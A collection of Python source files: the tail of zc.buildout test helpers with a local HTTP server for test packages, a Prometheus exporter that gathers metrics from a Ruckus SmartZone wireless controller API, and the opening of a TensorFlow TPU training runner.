close_fds=MUST_CLOSE_FDS) i, o, e = (p.stdin, p.stdout, p.stderr) if input: i.write(input.encode()) i.close() result = o.read() + e.read() o.close() e.close() output = result.decode() if with_exit_code: # Use the with_exit_code=True parameter when you want to test the exit # code of the command you're running. 
output += 'EXIT CODE: %s' % p.wait() return output def get(url): return str(urlopen(url).read().decode()) def _runsetup(setup, *args): if os.path.isdir(setup): setup = os.path.join(setup, 'setup.py') args = list(args) args.insert(0, '-q') here = os.getcwd() try: os.chdir(os.path.dirname(setup)) zc.buildout.easy_install.call_subprocess( [sys.executable, setup] + args, env=dict(os.environ, PYTHONPATH=setuptools_location)) if os.path.exists('build'): rmtree('build') finally: os.chdir(here) def sdist(setup, dest): _runsetup(setup, 'sdist', '-d', dest, '--formats=zip') def bdist_egg(setup, executable, dest=None): # Backward compat: if dest is None: dest = executable else: assert executable == sys.executable, (executable, sys.executable) _runsetup(setup, 'bdist_egg', '-d', dest) def wait_until(label, func, *args, **kw): if 'timeout' in kw: kw = dict(kw) timeout = kw.pop('timeout') else: timeout = 30 deadline = time.time()+timeout while time.time() < deadline: if func(*args, **kw): return time.sleep(0.01) raise ValueError('Timed out waiting for: '+label) class TestOptions(zc.buildout.buildout.Options): def initialize(self): pass class Buildout(zc.buildout.buildout.Buildout): def __init__(self): zc.buildout.buildout.Buildout.__init__( self, '', [('buildout', 'directory', os.getcwd())]) Options = TestOptions def buildoutSetUp(test): test.globs['__tear_downs'] = __tear_downs = [] test.globs['register_teardown'] = register_teardown = __tear_downs.append prefer_final = zc.buildout.easy_install.prefer_final() register_teardown( lambda: zc.buildout.easy_install.prefer_final(prefer_final) ) here = os.getcwd() register_teardown(lambda: os.chdir(here)) handlers_before_set_up = logging.getLogger().handlers[:] def restore_root_logger_handlers(): root_logger = logging.getLogger() for handler in root_logger.handlers[:]: root_logger.removeHandler(handler) for handler in handlers_before_set_up: root_logger.addHandler(handler) register_teardown(restore_root_logger_handlers) base = tempfile.mkdtemp('buildoutSetUp') base = os.path.realpath(base) register_teardown(lambda base=base: rmtree(base)) old_home = os.environ.get('HOME') os.environ['HOME'] = os.path.join(base, 'bbbBadHome') def restore_home(): if old_home is None: del os.environ['HOME'] else: os.environ['HOME'] = old_home register_teardown(restore_home) base = os.path.join(base, '_TEST_') os.mkdir(base) tmp = tempfile.mkdtemp('buildouttests') register_teardown(lambda: rmtree(tmp)) zc.buildout.easy_install.default_index_url = 'file://'+tmp os.environ['buildout-testing-index-url'] = ( zc.buildout.easy_install.default_index_url) def tmpdir(name): path = os.path.join(base, name) mkdir(path) return path sample = tmpdir('sample-buildout') os.chdir(sample) # Create a basic buildout.cfg to avoid a warning from buildout: open('buildout.cfg', 'w').write( "[buildout]\nparts =\n" ) # Use the buildout bootstrap command to create a buildout zc.buildout.buildout.Buildout( 'buildout.cfg', [('buildout', 'log-level', 'WARNING'), # trick bootstrap into putting the buildout develop egg # in the eggs dir. 
('buildout', 'develop-eggs-directory', 'eggs'), ] ).bootstrap([]) # Create the develop-eggs dir, which didn't get created the usual # way due to the trick above: os.mkdir('develop-eggs') def start_server(path): port, thread = _start_server(path, name=path) url = 'http://localhost:%s/' % port register_teardown(lambda: stop_server(url, thread)) return url cdpaths = [] def cd(*path): path = os.path.join(*path) cdpaths.append(os.path.abspath(os.getcwd())) os.chdir(path) def uncd(): os.chdir(cdpaths.pop()) test.globs.update(dict( sample_buildout = sample, ls = ls, cat = cat, mkdir = mkdir, rmdir = rmdir, remove = remove, tmpdir = tmpdir, write = write, system = system, get = get, cd = cd, uncd = uncd, join = os.path.join, sdist = sdist, bdist_egg = bdist_egg, start_server = start_server, buildout = os.path.join(sample, 'bin', 'buildout'), wait_until = wait_until, print_ = print_, clean_up_pyc = clean_up_pyc, )) zc.buildout.easy_install.prefer_final(prefer_final) def buildoutTearDown(test): for f in test.globs['__tear_downs']: f() class Server(HTTPServer): def __init__(self, tree, *args): HTTPServer.__init__(self, *args) self.tree = os.path.abspath(tree) __run = True def serve_forever(self): while self.__run: self.handle_request() def handle_error(self, *_): self.__run = False class Handler(BaseHTTPRequestHandler): Server.__log = False def __init__(self, request, address, server): self.__server = server self.tree = server.tree BaseHTTPRequestHandler.__init__(self, request, address, server) def do_GET(self): if '__stop__' in self.path: raise SystemExit def k(): self.send_response(200) out = '<html><body>k</body></html>\n'.encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) if self.path == '/enable_server_logging': self.__server.__log = True return k() if self.path == '/disable_server_logging': self.__server.__log = False return k() path = os.path.abspath(os.path.join(self.tree, *self.path.split('/'))) if not ( ((path == self.tree) or path.startswith(self.tree+os.path.sep)) and os.path.exists(path) ): self.send_response(404, 'Not Found') #self.send_response(200) out = '<html><body>Not Found</body></html>'.encode() #out = '\n'.join(self.tree, self.path, path) self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) return self.send_response(200) if os.path.isdir(path): out = ['<html><body>\n'] names = sorted(os.listdir(path)) for name in names: if os.path.isdir(os.path.join(path, name)): name += '/' out.append('<a href="%s">%s</a><br>\n' % (name, name)) out.append('</body></html>\n') out = ''.join(out).encode() self.send_header('Content-Length', str(len(out))) self.send_header('Content-Type', 'text/html') else: out = open(path, 'rb').read() self.send_header('Content-Length', len(out)) if path.endswith('.egg'): self.send_header('Content-Type', 'application/zip') elif path.endswith('.gz'): self.send_header('Content-Type', 'application/x-gzip') elif path.endswith('.zip'): self.send_header('Content-Type', 'application/x-gzip') else: self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(out) def log_request(self, code): if self.__server.__log: print_('%s %s %s' % (self.command, code, self.path)) def _run(tree, port): server_address = ('localhost', port) httpd = Server(tree, server_address, Handler) httpd.serve_forever() def get_port(): for i in range(10): port = random.randrange(20000, 30000) s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: try: s.connect(('localhost', port)) except socket.error: return port finally: s.close() raise RuntimeError("Can't find port") def _start_server(tree, name=''): port = get_port() thread = threading.Thread(target=_run, args=(tree, port), name=name) thread.setDaemon(True) thread.start() wait(port, up=True) return port, thread def start_server(tree): return _start_server(tree)[0] def stop_server(url, thread=None): try: urlopen(url+'__stop__') except Exception: pass if thread is not None: thread.join() # wait for thread to stop def wait(port, up): addr = 'localhost', port for i in range(120): time.sleep(0.25) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(addr) s.close() if up: break except socket.error: e = sys.exc_info()[1] if e[0] not in (errno.ECONNREFUSED, errno.ECONNRESET): raise s.close() if not up: break else: if up: raise else: raise SystemError("Couln't stop server") def install(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) if dist.location.endswith('.egg'): destination = os.path.join(destination, os.path.basename(dist.location), ) if os.path.isdir(dist.location): shutil.copytree(dist.location, destination) else: shutil.copyfile(dist.location, destination) else: # copy link open(os.path.join(destination, project+'.egg-link'), 'w' ).write(dist.location) def install_develop(project, destination): if not isinstance(destination, str): destination = os.path.join(destination.globs['sample_buildout'], 'develop-eggs') dist = pkg_resources.working_set.find( pkg_resources.Requirement.parse(project)) open(os.path.join(destination, project+'.egg-link'), 'w' ).write(dist.location) def _normalize_path(match): path = match.group(1) if os.path.sep == '\\': path = path.replace('\\\\', '/') if path.startswith('\\'): path = path[1:] return '/' + path.replace(os.path.sep, '/') normalize_path = ( re.compile( r'''[^'" \t\n\r]+\%(sep)s_[Tt][Ee][Ss][Tt]_\%(sep)s([^"' \t\n\r]+)''' % dict(sep=os.path.sep)), _normalize_path, ) normalize_endings = re.compile('\r\n'), '\n' normalize_script = ( re.compile('(\n?)- ([a-zA-Z_.-]+)-script.py\n- \\2.exe\n'), '\\1- \\2\n') if sys.version_info > (2, ): normalize___pycache__ = ( re.compile('(\n?)d __pycache__\n'), '\\1') else: normalize___pycache__ = ( re.compile('(\n?)- \S+\.pyc\n'), '\\1') normalize_egg_py = ( re.compile('-py\d[.]\d(-\S+)?.egg'), '-pyN.N.egg', ) normalize_exception_type_for_python_2_and_3 = ( re.compile(r'^(\w+\.)*([A-Z][A-Za-z0-9]+Error: )'), '\2') not_found = (re.compile(r'Not found: [^\n]+/(\w|\.)+/\r?\n'), '') # Setuptools now pulls in dependencies when installed. adding_find_link = (re.compile(r"Adding find link '[^']+'" r" from setuptools .*\r?\n"), '') ignore_not_upgrading = ( re.compile( 'Not upgrading because not running a local buildout command.\n' ), '')
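# Hedged usage sketch (illustration only, not part of the zc.buildout test
# suite): buildoutSetUp() above normally injects these helpers into doctest
# globals, but system(), wait_until() and the small HTTP server can also be
# driven directly.  The directory path below is a placeholder.
def _demo_helpers(tree='/tmp/sample-eggs'):
    # Run a shell command, capturing stdout+stderr and the exit code.
    print_(system('echo hello', with_exit_code=True))

    # Poll until a condition holds, failing after the given timeout.
    wait_until('tree exists', os.path.exists, tree, timeout=5)

    # Serve the tree over HTTP on a random port, then shut the server down.
    port, thread = _start_server(tree, name='demo')
    print_(get('http://localhost:%s/' % port))
    stop_server('http://localhost:%s/' % port, thread)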
smartzone_exporter.py
# requests used to fetch API data import requests # Allow for silencing insecure warnings from requests from requests.packages.urllib3.exceptions import InsecureRequestWarning # Builtin JSON module for testing - might not need later import json # Needed for sleep and exporter start/end time metrics import time # argparse module used for providing command-line interface import argparse # Prometheus modules for HTTP server & metrics from prometheus_client import start_http_server, Summary from prometheus_client.core import GaugeMetricFamily, CounterMetricFamily, REGISTRY # Import Treading and queue import queue import threading # Create SmartZoneCollector as a class - in Python3, classes inherit object as a base class # Only need to specify for compatibility or in Python2 class SmartZoneCollector(): # Initialize the class and specify required argument with no default value # When defining class methods, must explicitly list `self` as first argument def __init__(self, target, user, password, insecure): # Strip any trailing "/" characters from the provided url self._target = target.rstrip("/") # Take these arguments as provided, no changes needed self._user = user self._password = password self._insecure = insecure self._headers = None self._statuses = None # With the exception of uptime, all of these metrics are strings # Following the example of node_exporter, we'll set these string metrics with a default value of 1 def get_session(self): # Disable insecure request warnings if SSL verification is disabled if self._insecure == False: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Session object used to keep persistent cookies and connection pooling s = requests.Session() # Set `verify` variable to enable or disable SSL checking # Use string method format methods to create new string with inserted value (in this case, the URL) s.get('{}/wsg/api/public/v9_0/session'.format(self._target), verify=self._insecure) # Define URL arguments as a dictionary of strings 'payload' payload = {'username': self._user, 'password': self._password} # Call the payload using the json parameter r = s.post('{}/wsg/api/public/v9_0/session'.format(self._target), json=payload, verify=self._insecure) # Raise bad requests r.raise_for_status() # Create a dictionary from the cookie name-value pair, then get the value based on the JSESSIONID key session_id = r.cookies.get_dict().get('JSESSIONID') # Add HTTP headers for all requests EXCEPT logon API # Integrate the session ID into the header self._headers = {'Content-Type': 'application/json;charset=UTF-8', 'Cookie': 'JSESSIONID={}'.format(session_id)} def get_metrics(self, metrics, api_path): # Add the individual URL paths for the API call self._statuses = list(metrics.keys()) if 'query' in api_path: # For APs, use POST and API query to reduce number of requests and improve performance # To-do: set dynamic AP limit based on SmartZone inventory raw = {'page': 0, 'start': 0, 'limit': 1000} r = requests.post('{}/wsg/api/public/v9_0/{}'.format(self._target, api_path), json=raw, headers=self._headers, verify=self._insecure) else: r = requests.get('{}/wsg/api/public/v9_0/{}'.format(self._target, api_path + '?listSize=1000'), headers=self._headers, verify=self._insecure) result = json.loads(r.text) return result def collect(self): controller_metrics = { 'model': GaugeMetricFamily('smartzone_controller_model', 'SmartZone controller model', labels=["id", "model"]), 'description': GaugeMetricFamily('smartzone_controller_description', 'SmartZone controller 
description', labels=["id", "description"]), 'serialNumber': GaugeMetricFamily('smartzone_controller_serial_number', 'SmartZone controller serial number', labels=["id", "serialNumber"]), 'clusterRole': GaugeMetricFamily('smartzone_controller_cluster_role', 'SmartZone controller cluster role', labels=["id", "serialNumber"]), 'uptimeInSec': CounterMetricFamily('smartzone_controller_uptime_seconds', 'Controller uptime in sections', labels=["id"]), 'version': GaugeMetricFamily('smartzone_controller_version', 'Controller version', labels=["id", "version"]), 'apVersion': GaugeMetricFamily('smartzone_controller_ap_firmware_version', 'Firmware version on controller APs', labels=["id", "apVersion"]) } zone_metrics = { 'totalAPs': GaugeMetricFamily('smartzone_zone_total_aps', 'Total number of APs in zone', labels=["zone_name", "zone_id"]), 'discoveryAPs': GaugeMetricFamily('smartzone_zone_discovery_aps', 'Number of zone APs in discovery state', labels=["zone_name", "zone_id"]), 'connectedAPs': GaugeMetricFamily('smartzone_zone_connected_aps', 'Number of connected zone APs', labels=["zone_name", "zone_id"]), 'disconnectedAPs': GaugeMetricFamily('smartzone_zone_disconnected_aps', 'Number of disconnected zone APs', labels=["zone_name", "zone_id"]), 'clients': GaugeMetricFamily('smartzone_zone_total_connected_clients', 'Total number of connected clients in zone', labels=["zone_name", "zone_id"]) } system_metric = { 'cpu': { 'percent': GaugeMetricFamily('smartzone_system_cpu_usage', 'SmartZone system CPU usage', labels=["id"]) }, 'disk': { 'total': GaugeMetricFamily('smartzone_system_disk_size', 'SmartZone system disk size', labels=["id"]), 'free': GaugeMetricFamily('smartzone_system_disk_free', 'SmartZone system disk free space', labels=["id"]), }, 'memory': { 'percent': GaugeMetricFamily('smartzone_system_memory_usage', 'SmartZone system memory usage', labels=["id"]) }, 'control': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'management': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps 
(Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'cluster': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'port1': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) }, 'port2': { 'rxBps': GaugeMetricFamily('smartzone_system_port_rxBps', 'SmartZone system port rxBps (Throughput)', labels=["id", "port"]), 'rxBytes': GaugeMetricFamily('smartzone_system_port_rxBytes', 'SmartZone system port total rxBytes', labels=["id", "port"]), 'rxDropped': GaugeMetricFamily('smartzone_system_port_rxDropped', 'SmartZone system port total rxDropped', labels=["id", "port"]), 'rxPackets': GaugeMetricFamily('smartzone_system_port_rxPackets', 'SmartZone system port total rxPackets', labels=["id", "port"]), 'txBps': GaugeMetricFamily('smartzone_system_port_txBps', 'SmartZone system port txBps (Throughput)', labels=["id", "port"]), 'txBytes': GaugeMetricFamily('smartzone_system_port_txBytes', 'SmartZone system port total txBytes', labels=["id", "port"]), 'txDropped': GaugeMetricFamily('smartzone_system_port_txDropped', 'SmartZone system port total txDropped', labels=["id", "port"]), 'txPackets': GaugeMetricFamily('smartzone_system_port_txPackets', 'SmartZone system port total txPackets', labels=["id", "port"]) } } 
system_summary_metric = { 'maxApOfCluster': GaugeMetricFamily('smartzone_cluster_maxAPs', 'SmartZone Cluster number of maximum possible connected APs', labels=["id"]), 'totalRemainingApCapacity': GaugeMetricFamily('smartzone_cluster_totalRemainingApCapacity', 'SmartZone Cluster number of total remaining possible connected APs', labels=["id"]), } ap_list = { 'apGroupId': GaugeMetricFamily('smartzone_aps_list_ap_groupId', 'SmartZone APs list ap groupId', labels=["zone_id", "ap_mame", "ap_mac", "groupId"]), 'serial': GaugeMetricFamily('smartzone_aps_list_ap_serial', 'SmartZone APs list ap serial number', labels=["zone_id", "ap_mame", "ap_mac", "serial"]) } ap_metrics = { 'mac': GaugeMetricFamily('smartzone_ap_mac', 'SmartZone AP mac', labels=["ap_mac", "mac"]), 'model': GaugeMetricFamily('smartzone_ap_model', 'SmartZone AP model', labels=["ap_mac", "model"]), 'version': GaugeMetricFamily('smartzone_ap_version', 'SmartZone AP version', labels=["ap_mac", "version"]), 'description': GaugeMetricFamily('smartzone_ap_description', 'SmartZone AP description', labels=["ap_mac", "description"]), 'zoneId': GaugeMetricFamily('smartzone_ap_zoneId', 'SmartZone AP zone id', labels=["ap_mac", "zoneId"]), 'connectionState': GaugeMetricFamily('smartzone_ap_connectionState', 'SmartZone AP connection state', labels=["ap_mac", "connectionState"]), 'wifi50Channel': GaugeMetricFamily('smartzone_ap_wifi50Channel', 'SmartZone AP 5GHz channel number', labels=["ap_mac"]), 'wifi24Channel': GaugeMetricFamily('smartzone_ap_wifi24Channel', 'SmartZone AP 2.4GHz channel number', labels=["ap_mac"]), 'approvedTime': GaugeMetricFamily('smartzone_ap_approvedTime', 'SmartZone AP approved time', labels=["ap_mac"]), 'lastSeenTime': GaugeMetricFamily('smartzone_ap_lastSeenTime', 'SmartZone AP last seen time', labels=["ap_mac"]), 'uptime': GaugeMetricFamily('smartzone_ap_uptime', 'SmartZone AP uptime', labels=["mac"]), 'clientCount': GaugeMetricFamily('smartzone_ap_clientCount', 'SmartZone AP client count', labels=["ap_mac"]) } ap_summary_list = { 'location': GaugeMetricFamily('smartzone_aps_location', 'SmartZone AP location', labels=["ap_mame", "ap_mac", "location"]), 'configState': GaugeMetricFamily('smartzone_aps_configState', 'SmartZone AP configState', labels=["ap_mame", "ap_mac", "configState"]), 'criticalCount': GaugeMetricFamily('smartzone_aps_alarms_criticalCount', 'SmartZone AP criticalCount alarm', labels=["ap_mame", "ap_mac"]), 'majorCount': GaugeMetricFamily('smartzone_aps_alarms_majorCount', 'SmartZone majorCount alarms', labels=["ap_mame", "ap_mac"]), 'minorCount': GaugeMetricFamily('smartzone_aps_alarms_minorCount', 'SmartZone AP minorCount alarms', labels=["ap_mame", "ap_mac"]), 'warningCount': GaugeMetricFamily('smartzone_aps_alarms_warningCount', 'SmartZone AP warningCount alarm', labels=["ap_mame", "ap_mac"]) } domain_metrics = { 'domainType': GaugeMetricFamily('smartzone_domain_type', 'SmartZone Domain name', labels=["domain_id", "domain_name", "domainType"]), 'parentDomainId': GaugeMetricFamily('smartzone_domain_parentDomainId', 'SmartZone Domain parent domain ID', labels=["domain_id", "domain_name", "parentDomainId"]), 'subDomainCount': GaugeMetricFamily('smartzone_domain_subDomainCount', 'SmartZone Domain sub domain numbers', labels=["domain_id", "domain_name"]), 'apCount': GaugeMetricFamily('smartzone_domain_apCount', 'SmartZone Domain total count of APs', labels=["domain_id", "domain_name"]), 'zoneCount': GaugeMetricFamily('smartzone_domain_zoneCount', 'SmartZone Domain count of zones', labels=["domain_id", 
"domain_name"]) } license_metrics = { 'description': GaugeMetricFamily('smartzone_license_description', 'SmartZone License description', labels=["license_name", "description"]), 'count': GaugeMetricFamily('smartzone_license_count', 'SmartZone License count', labels=["license_name"]), 'createTime': GaugeMetricFamily('smartzone_license_createTime', 'SmartZone License created date', labels=["license_name", "createTime"]), 'expireDate': GaugeMetricFamily('smartzone_license_expireDate', 'SmartZone License expire date', labels=["license_name", "expireDate"]) } self.get_session() id = 0 # Get SmartZone controller metrics for c in self.get_metrics(controller_metrics, 'controller')['list']: id = c['id'] for s in self._statuses: if s == 'uptimeInSec': controller_metrics[s].add_metric([id], c.get(s)) # Export a dummy value for string-only metrics else: extra = c[s] controller_metrics[s].add_metric([id, extra], 1) for m in controller_metrics.values(): yield m # Get SmartZone system metric path = 'controller/' + id + '/statistics' system = self.get_metrics(system_metric, path) for c in system_metric: varList = list(system_metric[c].keys()) for s in varList: # Add dummy comment (port name) for port statistic if c == 'port1' or c == 'port2' or c == 'control' or c == 'cluster' or c == 'management': system_metric[c][s].add_metric([id, c], system[0][c].get(s)) # For normal metric else: system_metric[c][s].add_metric([id], system[0][c].get(s)) for m in system_metric[c].values(): yield m # Ges SmartZone system summary c = self.get_metrics(system_summary_metric, 'system/devicesSummary') for s in self._statuses: system_summary_metric[s].add_metric([id], c.get(s)) for m in system_summary_metric.values(): yield m # Get SmartZone inventory per zone # For each zone captured from the query: # - Grab the zone name and zone ID for labeling purposes # - Loop through the statuses in statuses # - For each status, get the value for the status in each zone and add to the metric for zone in self.get_metrics(zone_metrics, 'system/inventory')['list']: zone_name = zone['zoneName'] zone_id = zone['zoneId'] for s in self._statuses: zone_metrics[s].add_metric([zone_name, zone_id], zone.get(s)) for m in zone_metrics.values(): yield m # Get APs list per zone or a domani # For each APs captured from the query: # - Grab the zone ID for labeling purposes # - For each APs, get mac, zoneID, apGroupIdm, name, lanPortSize ap_glob_mac = [] for ap in self.get_metrics(ap_list, 'aps')['list']: zone_id = ap['zoneId'] ap_mame = ap['name'] ap_mac = ap['mac'] ap_glob_mac.append(ap_mac) for s in self._statuses: # Export a dummy value for string-only metrics extra = ap[s] ap_list[s].add_metric([zone_id, ap_mame, ap_mac, extra], 1) for m in ap_list.values(): yield m num_worker_threads = 10 def source(): return ap_glob_mac def worker(): while True: item = q.get() if item is None: break path = 'aps/' + item + '/operational/summary' r.put(self.get_metrics(ap_metrics, path)) q.task_done() # Queue for threads q = queue.Queue() # Queue for result from api r = queue.Queue() threads = [] for i in range(num_worker_threads): t = threading.Thread(target=worker) t.start() threads.append(t) for item in source(): q.put(item) # block until all tasks are done q.join() # stop workers for i in range(num_worker_threads): q.put(None) for t in threads: t.join() ap_mac = 0 for i in range(r.qsize()): ap_detail = r.get(block=True, timeout=None) for d in list(ap_metrics.keys()): if d == 'mac': ap_mac = ap_detail[d] if d == 'description' or d == 'version' or d == 'model' or 
d == 'zoneId' or d == 'mac' or d == 'connectionState': extra = ap_detail[d] ap_metrics[d].add_metric([ap_mac, extra], 1) else: ap_metrics[d].add_metric([ap_mac], ap_detail.get(d)) for m in ap_metrics.values(): yield m # Get APs summary information for ap in self.get_metrics(ap_summary_list, 'aps/lineman')['list']: ap_mame = ap['name'] ap_mac = ap['mac'] for s in self._statuses: if s == 'criticalCount' or s == 'majorCount' or s == 'minorCount' or s == 'warningCount': ap_summary_list[s].add_metric([ap_mame, ap_mac], ap['alarms'].get(s)) else: extra = ap[s] ap_summary_list[s].add_metric([ap_mame, ap_mac, extra], 1) for m in ap_summary_list.values(): yield m # Collect domain information for c in self.get_metrics(domain_metrics, 'domains')['list']: domain_id = c['id'] domain_name = c['name'] for s in self._statuses: if s == 'domainType' or s == 'parentDomainId': extra = c[s] domain_metrics[s].add_metric([domain_id, domain_name, extra], 1) else: domain_metrics[s].add_metric([domain_id, domain_name], c.get(s)) for m in domain_metrics.values(): yield m # Collect license information for c in self.get_metrics(license_metrics, 'licenses')['list']: license_name = c['name'] for s in self._statuses: if s == 'count': license_metrics[s].add_metric([license_name], c.get(s)) else: extra = c[s] license_metrics[s].add_metric([license_name, extra], 1) for m in license_metrics.values(): yield m # Function to parse command line arguments and pass them to the collector def parse_args(): parser = argparse.ArgumentParser(description='Ruckus SmartZone exporter for Prometheus') # Use add_argument() method to specify options # By default argparse will treat any arguments with flags (- or --) as optional # Rather than make these required (considered bad form), we can create another group for required options required_named = parser.add_argument_group('required named arguments') required_named.add_argument('-u', '--user', help='SmartZone API user', required=True) required_named.add_argument('-p', '--password', help='SmartZone API password', required=True) required_named.add_argument('-t', '--target', help='Target URL and port to access SmartZone, e.g. https://smartzone.example.com:8443', required=True) # Add store_false action to store true/false values, and set a default of True parser.add_argument('--insecure', action='store_false', help='Allow insecure SSL connections to Smartzone') # Specify integer type for the listening port parser.add_argument('--port', type=int, default=9345, help='Port on which to expose metrics and web interface (default=9345)') # Now that we've added the arguments, parse them and return the values as output return parser.parse_args() def main(): try: args = parse_args() port = int(args.port) REGISTRY.register(SmartZoneCollector(args.target, args.user, args.password, args.insecure)) # Start HTTP server on specified port start_http_server(port) if args.insecure == False: print('WARNING: Connection to {} may not be secure.'.format(args.target)) print("Polling {}. Listening on ::{}".format(args.target, port)) while True: time.sleep(1) except KeyboardInterrupt: print(" Keyboard interrupt, exiting...") exit(0) if __name__ == "__main__": main()
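# A minimal sketch of the prometheus_client custom-collector pattern that
# SmartZoneCollector above relies on: a class with a collect() generator that
# builds fresh metric families on every scrape, registered with REGISTRY and
# served by start_http_server(). The collector name, metric name and target
# label below are illustrative only and not part of the exporter itself.
from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, REGISTRY
import time

class DemoCollector(object):
    def collect(self):
        # Build a new family per scrape; label values are supplied at add_metric() time.
        g = GaugeMetricFamily('demo_up', 'Dummy availability metric', labels=['target'])
        g.add_metric(['smartzone.example.com'], 1)
        yield g

if __name__ == '__main__':
    REGISTRY.register(DemoCollector())
    start_http_server(9345)  # metrics exposed at http://localhost:9345/metrics
    while True:
        time.sleep(1)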
train_runner.py
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bypass TPUEstimator for ResNet-50 Train."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import math
import threading
import time

from absl import flags
import tensorflow as tf

from tensorflow.contrib import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_function
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.framework import graph_io

FLAGS = flags.FLAGS

_INITIAL_LOSS = 1e7


def device_for_tpu_core(task=0, core=0):
  job_name = FLAGS.tpu_job_name or "tpu_worker"
  return "/job:%s/task:%d/device:TPU_REPLICATED_CORE:%d" % (job_name, task, core)


def wrap_computation_in_while_loop(op_fn, n, parallel_iterations=1):
  """Wraps the ops generated by `op_fn` in tf.while_loop."""

  def computation(i):
    ops = op_fn()
    if not isinstance(ops, list):
      ops = [ops]
    with tf.control_dependencies(ops):
      return i + 1

  return tf.while_loop(
      lambda i: tf.less(i, n),
      computation, [tf.constant(0)],
      parallel_iterations=parallel_iterations)


def tpu_ordinal_fn(shard_index_in_host):
  """Return the TPU ordinal associated with a shard.

  Required because the enqueue ops are placed on CPU.

  Args:
    shard_index_in_host: the shard index

  Returns:
    The ordinal of the TPU device the shard's infeed should be placed on.
  """
  return shard_index_in_host % FLAGS.tpu_cores_per_host


class TrainRunner(object):
  """Remove init overheads in TPU Estimator via direct session.run calls."""

  def __init__(self, iterations, train_steps):
    tf.logging.info("TrainRunner: constructor")
    self.feature_structure = {}
    self.loss = None
